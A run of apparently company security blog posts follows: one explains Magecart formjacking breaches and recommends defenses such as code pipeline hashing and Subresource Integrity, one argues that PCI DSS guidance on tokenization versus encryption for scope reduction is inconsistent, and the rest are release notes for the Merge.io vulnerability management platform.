The recent breaches at Ticketmaster, British Airways and Newegg that have been attributed to the hacking group Magecart have many e-commerce merchants taking a closer look at any potential exposure. And rightfully so.
The inserted code that provided the compromise of credit card data leverages the logical structure of the Document Object Model (DOM) to be able to access and manipulate anything on the page. This includes the ability to send data to a malicious entity behind the scenes of a normally operating payment page as in the case of these Magecart breaches. This is also known as formjacking. With access to the DOM, many common security measures are effectively bypassed. This includes the embedding of iFrames and even the implementation of browser-based encryption in order to better secure payment data upon collection from the customer.
Once the attackers gain access to the source code they own any data that you are collecting from the user.
To make things more difficult, today’s common web pages are loading dozens of scripts from many different locations. This includes scripts loaded from internal systems as well as from third party providers. Any one of these scripts has the ability to manipulate data elements that are being collected from the customer.
I believe that this type of attack will continue to grow due to the number of possible vectors of infection a given page and the value of the customer data that is at risk. I also believe that this will eventually drive changes with the PCI council’s approach to e-commerce guidelines and requirements. Hopefully providing more emphasis on server-based controls and a much needed focus on securing the source code and development pipeline.
What can we do to help reduce the risk of these types of attacks?
Secure the source code pipeline: So much of our technology world these days is powered by code, this includes infrastructure changes, automation and of course our applications. The entire code pipeline should be a focus for security controls to ensure the integrity of the code from source, to build to deployment. Consider implementing hashing checks throughout this process and alerting when hashes do not match. This provides a mechanism to ensure that what was developed at least makes it to the intended destination
Secure the origin servers: Once our servers get the validated source code we should have a way to periodically check the code that is running to ensure that it hasn’t changed. This can be accomplished through various scripting methods, automation tools or open source tools such as OSQuery.
Implement Subresource Integrity checks: The use of Content Security Policies in conjunction with Subresource Integrity can ensure that files that your pages fetch from anywhere (third party, CDN or internally) have been delivered without any changes. This is accomplished by delivering signatures of the known-good scripts that the browser verifies prior to execution. Once again it is important to note that if the attacker has access to the origin source code – all of this behavior can be modified.
The added measures of knowing that the code you authored is what is running on your servers and having visibility when that changes can help to reduce the risk of these type of attacks for your organization. Leverage automation as much as possible to ensure these measures don’t have a negative impact on the efficiencies of deploying often.
- British Airways Breach (RiskIQ)
- Ticketmaster Breach (RiskIQ)
- Newegg Breach (RiskIQ)
- Shopper Approved Breach (RiskIQ)
- Subresource Integrity
Many organizations seek ways to reduce the scope for PCI DSS. While there are many different methods of reducing scope, I want to focus specifically on tokenization and encryption of the primary account number (PAN).
For the intent of this post we will assume that the encryption and tokenization methods that are used meet the appropriate requirements to protect the PAN and that unauthorized attempts to reverse the token or encrypted value would be computationally infeasible. Additionally, I want to note that this post is not arguing the technical strengths or differences between tokenization and encryption, just to point out the council’s documented view on PCI DSS scope as it relates to the key and vault management aspect of these technologies.
From the PCI Security Standards Glossary of Terms: Encryption is the process of converting information into an unintelligible form except to holders of a specific cryptographic key.
From the PCI DSS Tokenization Guidelines information supplement, tokenization is defined as a process by which the primary account number (PAN) is replaced with a surrogate value called a token. De-tokenization is the reverse process of redeeming a token for its associated PAN value.
For both tokenization and encryption, the overall principal is that a valuable data is altered into non-valuable data through a given mechanism. For encryption, that mechanism is the encryption process and the keys. For tokenization, the mechanism is the tokenization process and the relationship between the token and PAN. Additionally, the process of de-tokenization and decryption are similar in that there is a process to provide my encrypted data or tokenized data to a mechanism in order to receive the PAN in return.
The tokenization guidance that is provided in the PCI DSS Tokenization Guidelines August 2011 notes that tokenization can be used as a method of reducing the scope of PCI in an organization. There are obviously many considerations for de-scoping using tokenization that are adequately covered in this document. But it is important to note that the document does not seem to link de-scoping with who manages the tokenization process, vault or tables.
The topic of de-scoping using encryption is covered by the PCI DSS FAQ article 2086 where it is noted that scope reduction can be achieved only if the merchant or service provider does not have access to the encryption keys.
If we follow this logic through to its conclusion, the council seems to be saying that tokenization can be used as a method for scope reduction without restriction to who manages the tokenization mechanism, but encryption can only be used if the merchant or service provider has no access to the keying mechanism.
Here we have nearly identical fundamental approaches to protecting data. Each deals with nonsensical data that can be exchanged for valid data through a particular mechanism. Depending on the details of the architecture, each has the capability of adequately securing cardholder data. However, it seems that the council has added additional rules around scope reduction using encryption vs. tokenization.
First of all, I do not believe that the council should be able to dictate the ability to de-scope based on a potential management issue. It is feasible to architect an effective key management while keeping clear segregation of duties within the same organization or entity. I do not think it should be the council’s place to prohibit a solution based upon the predetermination that an organization cannot maintain effective segregation of duties or other risk mitigation strategies. An enterprise encryption strategy isn’t acquired as an off-the shelf widget that I just plug in and turn on. There are many different potential elements that can make up a solution (one-time use, long term storage, tokenization hybrid, etc). It should be left up to the QSA to determine if the implemented solution meets the intent of the requirements.
But more importantly for the purposes of this discussion is the inconsistency of the view of two nearly identical fundamental approaches to protecting sensitive data and the accompanying keying systems. Why is the council’s position on these two scenarios different? I hope that the council will address this ambiguity in upcoming FAQ’s or supplemental documentation as the current information that is available is contradictory in nature.
Merge.io now supports the direct import of the Foundstone/MVM Risk_Data.xml file. The Foundstone data is supplemented with additional vulnerability data from the National Vulnerability Database for use in the Merge.io platform.
Added National Vulnerability Database
The addition of 2million records of vulnerability data will help us to greatly enhance the vulnerability information that we have to correlate with customer’s data. See our blog post on the addition of the NVD to Merge.io.
Better charting and graphing support
We have changed our charting and graphics libraries to support better reporting and dashboard functionality.
Added better caching in the import process to improve performance.
We have added project based reporting. The project reporting outlines the risk of the vulnerabilities of the project, the current status of remediation and validation and the specific filtering rules that were applied to vulnerabilities to determine which vulnerabilities were remediated and which were not. The report is a PDF report that includes the following sections:
- Project Summary
- Vulnerability Summary
- Vulnerability Validation
- Risk Profile Filters
You can now leverage the remediation workflow, validation and custom filtering power of the Merge.io platform for your McAfee Vulnerability Manager / Foundstone scan data!
Adding Foundstone / MVM data to your Merge.io project allows you to sift through the volumes of vulnerabilities, automatically select the vulnerabilities that meet your policies (through our custom risk profiles) and track the vulnerabilities through to remediation and validation of closure. To import Foundstone / MVM data into Merge.io, simply export your scan results in XML format and upload the Risk_Data.xml file to your Merge.io Project.
Need to comply to PCI DSS requirements? Import your scan results and apply our built-in PCI Risk Profile. Only those vulnerabilities that are required to be fixed by PCI are added to your project.